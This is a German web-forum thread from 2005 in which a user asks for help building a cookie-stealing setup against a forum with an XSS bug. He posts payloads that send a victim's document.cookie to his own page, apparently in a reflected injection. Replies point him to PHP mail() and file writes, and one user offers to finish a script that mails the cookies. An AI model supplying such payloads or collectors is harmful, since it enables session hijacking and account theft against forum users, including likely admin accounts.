zurück zur Startseite
  


Zurück XHTMLforum > Webentwicklung (außer XHTML und CSS) > Serveradministration und serverseitige Scripte
Seite neu laden Cookie auslesen + speichern

Antwort
 
LinkBack Themen-Optionen Ansicht
  #1 (permalink)  
Alt 05.05.2005, 17:10
Memoli
Gast
Thread-Ersteller
 
Beiträge: n/a
Standard Cookie auslesen + speichern

Hallo,

Hab ein Problem, ich hoffe hier kann mir geholfen werden

Code:
<?php 
if(isset($_GET['cookie'])) { 
setcookie("setcookie2", $_GET['cookie']);
} 
else
{
echo "cookie nicht gesetzt";
}
?>
was ist an diesem code hier falsch? es klappt nicht.

Außerdem wohin speichert er das cookie dann, ins root verzeichniss vom webspace?

Und wie kann ich es machen das er den cookie an eine email verschickt?

Ich danke im Voraus

Mfg
Ryan Tyla
Mit Zitat antworten
Sponsored Links
  #2 (permalink)  
Alt 05.05.2005, 19:34
Benutzerbild von netspy
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 13.08.2004
Ort: Leipzig
Beiträge: 1.953
netspy sorgt für eine eindrucksvolle Atmosphärenetspy sorgt für eine eindrucksvolle Atmosphäre
Standard Re: Cookie auslesen + speichern

Zitat:
Zitat von Memoli
Hallo,

Code:
<?php 
if(isset($_GET['cookie'])) { 
setcookie("setcookie2", $_GET['cookie']);
} 
else
{
echo "cookie nicht gesetzt";
}
?>
was ist an diesem code hier falsch? es klappt nicht.
Cookies werden im Array $_COOKIE zur Verfügung gestellt.

Zitat:
Zitat von Memoli
Außerdem wohin speichert er das cookie dann, ins root verzeichniss vom webspace?
Cookies werden im Browser beim Benutzer gespeichert und nicht auf dem Server.

Zitat:
Zitat von Memoli
Und wie kann ich es machen das er den cookie an eine email verschickt?
Verstehe ich nicht. Warum willst du einen Cookie per E-Mail versenden? Erkläre doch mal genau, was du eigentlich vor hast.

Mario
__________________
AppDev Blog · AppDev Forum
Mit Zitat antworten
Sponsored Links
  #3 (permalink)  
Alt 05.05.2005, 20:01
Memoli
Gast
Thread-Ersteller
 
Beiträge: n/a
Standard

Hey,

Ich und ein Kollege von mir betreiben einen Forum, mir ist ein Bug in diesem bekannt geworden und möchte das gerne testen.

<script>document.location=
’http://myweb/empfang.php?cookie=’+document.cookie</script>

Dieses script soll Cookie an die empfang.php senden.

Nun möchte ich das empfang.php haben der diesen cookie aufnimmt und speichert bzw per Email weiterleitet.

Hoffe jetzt ist es deutlich geworden, und ihr könnt mir helfen.

PS: Ich möchte noch dazu sagen das ich im java und php Bereich nicht viel Ahnung habe.
Mit Zitat antworten
  #4 (permalink)  
Alt 05.05.2005, 21:04
Benutzerbild von netspy
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 13.08.2004
Ort: Leipzig
Beiträge: 1.953
netspy sorgt für eine eindrucksvolle Atmosphärenetspy sorgt für eine eindrucksvolle Atmosphäre
Standard

Ok, dann sag doch erst mal, was an deinem ersten Code nicht funktioniert? Kommt eine Fehlermeldung oder wird der Cookie nicht gesetzt oder ...?

Wenn du eine E-Mail versenden willst, musst du natürlich auch den entsprechenden Befehl mail() dafür verwenden. Wenn du den Inhalt von $_GET['cookie'] speichern willst, sind fopen(), fwrite() und Co. deine Freunde.

Ansonsten schreib bitte noch mal etwas genauer, was das eigentlich bringen soll. Ich vermute mal es geht darum, dass man in dem Forum JavaScript posten kann und damit Cookies der Betrachter auslesen kann. Das darf natürlich in keinem Forum funktionieren.

Mario
__________________
AppDev Blog · AppDev Forum
Mit Zitat antworten
  #5 (permalink)  
Alt 05.05.2005, 21:28
Memoli
Gast
Thread-Ersteller
 
Beiträge: n/a
Standard

Hey,

Ich kann leider kein PHP, deswegen fällt mir das alles so schwer.


Wie du es schon gesagt hat, in dem Forum ist ein XSS BUG drine, man kann es ausnutzen um z.b an Cookie ranzukommen. Und das möchte ich austesten.

a.php?lala="><script type="text/javascript">alert('Test'</script>

Ist ein einfaches alert und das funktioniert.

Nun möchte ich halt das ich mit dem script cookie an die empfang PHP verschicken:

"><script type="text/javascript">document.location='http://mypage.de/empfang.php?cookie='+document.cookie;</script>



Das Problem ist auf dem Server speichert er das Cookie nicht, also ist es auf dem Server nicht möglich das zu sehen was der script geschickt hat.


Genau, ich möchte gerne das er das speichert oder per email verschickt.

Kannst du mir dabei helfen?
Mit Zitat antworten
  #6 (permalink)  
Alt 05.05.2005, 22:16
Benutzerbild von netspy
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 13.08.2004
Ort: Leipzig
Beiträge: 1.953
netspy sorgt für eine eindrucksvolle Atmosphärenetspy sorgt für eine eindrucksvolle Atmosphäre
Standard

Schreib in dein PHP-Script einfach folgendes rein:

PHP-Code:
print_r($_GET); 
Damit wird dir der Inhalt aller übergebenen Parameter angezeigt.

Davon abgesehen wird es doch aber bestimmt einen Patch für dein Forum geben. vB, phpBB und wie sie alle heißen hatte wohl schon alle mal einen solchen Bug, der aber zum Glück meist schnell behoben wurde.

Mario
__________________
AppDev Blog · AppDev Forum
Mit Zitat antworten
  #7 (permalink)  
Alt 05.05.2005, 23:43
Neuer Benutzer
neuer user
 
Registriert seit: 02.05.2005
Beiträge: 6
Jann Hendrik befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von netspy
phpBB und wie sie alle heißen hatte wohl schon alle mal einen solchen Bug, der aber zum Glück meist schnell behoben wurde.
falsch!
Der Bug besteht auch weiterhin, weil die Programmierer von phpbb nicht nur die session_id() dort abgespeichert haben, sondern ua auch die userID des Forums..

btw: user No 2 ist fast immer der Admin.
*kopfschüttel*

auf phpBB will man davon aber nichts hören. Die stellen auf taub.


@Memoli: hast du es nun geschafft den Inhalt des Cookies per Mail zu schicken? Wenn nicht, dann melde dich nochmal, dann kann ich dir sagen, wie du die Daten verschickt bekommst.
Mit Zitat antworten
  #8 (permalink)  
Alt 06.05.2005, 00:04
Memoli
Gast
Thread-Ersteller
 
Beiträge: n/a
Standard

Nein habe es noch nicht geschafft ich bin zwar soweit aber es will nicht funktionieren.

Würd mich auf deine Hilfe freuen.
Mit Zitat antworten
  #9 (permalink)  
Alt 06.05.2005, 00:57
Benutzerbild von netspy
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 13.08.2004
Ort: Leipzig
Beiträge: 1.953
netspy sorgt für eine eindrucksvolle Atmosphärenetspy sorgt für eine eindrucksvolle Atmosphäre
Standard

Wie jetzt, kann man in phpBB JavaScript posten? Das wäre ja irgendwie mehr als daneben.

Mario
__________________
AppDev Blog · AppDev Forum
Mit Zitat antworten
Sponsored Links
  #10 (permalink)  
Alt 06.05.2005, 13:56
Neuer Benutzer
neuer user
 
Registriert seit: 02.05.2005
Beiträge: 6
Jann Hendrik befindet sich auf einem aufstrebenden Ast
Standard

warum soll man kein JS posten können?
es wird dann angezeigt, aber nicht ausgeführt.

Ich will dir das wohl gerne machen - sind ja nur ein paar Zeilen, aber wenn, dann will ich das auch eben getestet haben... (fehlt mir gerade an der Zeit)

im Prinzip mit foreach die Variable $_COOKIE durchgehen und die Werte an eine weitere Variable anhängen.
Dann die Variable per mail schicken...
Mit Zitat antworten
Sponsored Links
Antwort

Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Problem bei Cookie setzen mit Jquery ha-bauer Javascript & Ajax 0 19.11.2011 16:23
Datum und Uhrzeit in MySQL speichern andre-ne Serveradministration und serverseitige Scripte 3 29.04.2011 11:45
Funktion togglen und als Cookie speichern? sepp88 Javascript & Ajax 4 24.02.2010 17:36
Cookie lesen, zu kompliziert! cavebird Serveradministration und serverseitige Scripte 14 01.12.2009 13:25
SESSION / COOKIE - Konflikte poppihasi Serveradministration und serverseitige Scripte 1 23.12.2007 14:29


Alle Zeitangaben in WEZ +2. Es ist jetzt 10:39 Uhr.